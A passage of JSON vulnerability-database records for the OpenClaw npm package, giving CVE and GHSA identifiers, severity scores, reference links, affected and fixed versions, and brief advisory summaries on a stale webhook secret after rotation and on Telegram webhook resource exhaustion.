value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g5cg-8x5w-7jpm","reference_id":"","reference_type":"","scores":[{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"9.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T19:38:10Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g5cg-8x5w-7jpm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41329","reference_id":"CVE-2026-41329","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41329"},{"reference_url":"https://github.com/advisories/GHSA-g5cg-8x5w-7jpm","reference_id":"GHSA-g5cg-8x5w-7jpm","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-g5cg-8x5w-7jpm"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-sandbox-bypass-via-heartbeat-context-inheritance-and-senderisowner-escalation","reference_id":"openclaw-sandbox-bypass-via-heartbeat-context-inheritance-and-senderisowner-escalation","reference_type":"","scores":[{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T19:38:10Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-sandbox-bypass-via-heartbeat-context-inheritance-and-senderisowner-escalation"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41329","GHSA-g5cg-8x5w-7jpm"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3zx4-t8cj-kbfn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/95449?format=json","vulnerability_id":"VCID-4316-7q9a-xuhx","summary":"OpenClaw's Webhooks SecretRef route secret remains valid after rotation/reload\n## Summary\n\nOpenClaw webhooks allowed route secrets to be backed by `SecretRef` values, but cached the resolved secret for a route. After an operator rotated the underlying secret and ran `openclaw secrets reload`, the previous resolved webhook secret could remain valid until the plugin or gateway restarted.\n\n## Impact\n\nAn attacker who already had a previously valid webhook route secret could continue authenticating webhook requests after the operator rotated the secret and reloaded secrets. This weakened credential rotation for webhook routes and could allow continued invocation of the configured webhook task flow until restart.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` on npm\n- Affected: versions before `2026.4.23`\n- Fixed: `2026.4.23`\n- Latest stable verified fixed: `openclaw@2026.4.23`, tag `v2026.4.23`\n\n## Fix\n\nWebhook route authentication now resolves `SecretRef`-backed route secrets on each request. A rotated secret becomes effective after `openclaw secrets reload` without requiring a gateway or plugin restart, and the old secret is rejected.\n\n## Fix Commit(s)\n\n- `36c4a372a0ad5dca8bfc0d93f7aab9c2f2de66fa` (`fix(webhooks): reload route secrets per request`)\n\n## Severity\n\nSeverity remains `medium`. The attack requires possession of a previously valid route secret, but the stale credential can continue to authorize webhook actions after rotation.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-45005","reference_id":"","reference_type":"","scores":[{"value":"0.00056","scoring_system":"epss","scoring_elements":"0.17844","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00056","scoring_system":"epss","scoring_elements":"0.17878","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00056","scoring_system":"epss","scoring_elements":"0.17882","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-45005"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/36c4a372a0ad5dca8bfc0d93f7aab9c2f2de66fa","reference_id":"","reference_type":"","scores":[{"value":"6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L"},{"value":"6.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-12T16:10:40Z/"}],"url":"https://github.com/openclaw/openclaw/commit/36c4a372a0ad5dca8bfc0d93f7aab9c2f2de66fa"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-q8ff-7ffm-m3r9","reference_id":"","reference_type":"","scores":[{"value":"6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L"},{"value":"6.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-12T16:10:40Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-q8ff-7ffm-m3r9"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-45005","reference_id":"","reference_type":"","scores":[{"value":"6.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-45005"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-webhook-route-secret-cache-not-invalidated-after-rotation","reference_id":"","reference_type":"","scores":[{"value":"6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L"},{"value":"6.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-12T16:10:40Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-webhook-route-secret-cache-not-invalidated-after-rotation"},{"reference_url":"https://github.com/advisories/GHSA-q8ff-7ffm-m3r9","reference_id":"GHSA-q8ff-7ffm-m3r9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q8ff-7ffm-m3r9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114733?format=json","purl":"pkg:npm/openclaw@2026.4.23","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.23"}],"aliases":["CVE-2026-45005","GHSA-q8ff-7ffm-m3r9"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4316-7q9a-xuhx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91826?format=json","vulnerability_id":"VCID-44hp-3xh1-uyen","summary":"Duplicate Advisory: OpenClaw Telegram webhook request bodies were read before secret validation, enabling unauthenticated resource exhaustion\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-jq3f-vjww-8rq7. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw before 2026.3.13 reads and buffers Telegram webhook request bodies before validating the x-telegram-bot-api-secret-token header, allowing unauthenticated attackers to exhaust server resources. Attackers can send POST requests to the webhook endpoint to force memory consumption, socket time, and JSON parsing work before authentication validation occurs.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/7e49e98f79073b11134beac27fdff547ba5a4a02","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/7e49e98f79073b11134beac27fdff547ba5a4a02"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jq3f-vjww-8rq7","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jq3f-vjww-8rq7"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32980","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32980"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-resource-exhaustion-via-unauthenticated-telegram-webhook-request","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-resource-exhaustion-via-unauthenticated-telegram-webhook-request"},{"reference_url":"https://github.com/advisories/GHSA-c447-w54g-f55j","reference_id":"GHSA-c447-w54g-f55j","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-c447-w54g-f55j"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/984793?format=json","purl":"pkg:npm/openclaw@2026.3.13-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability"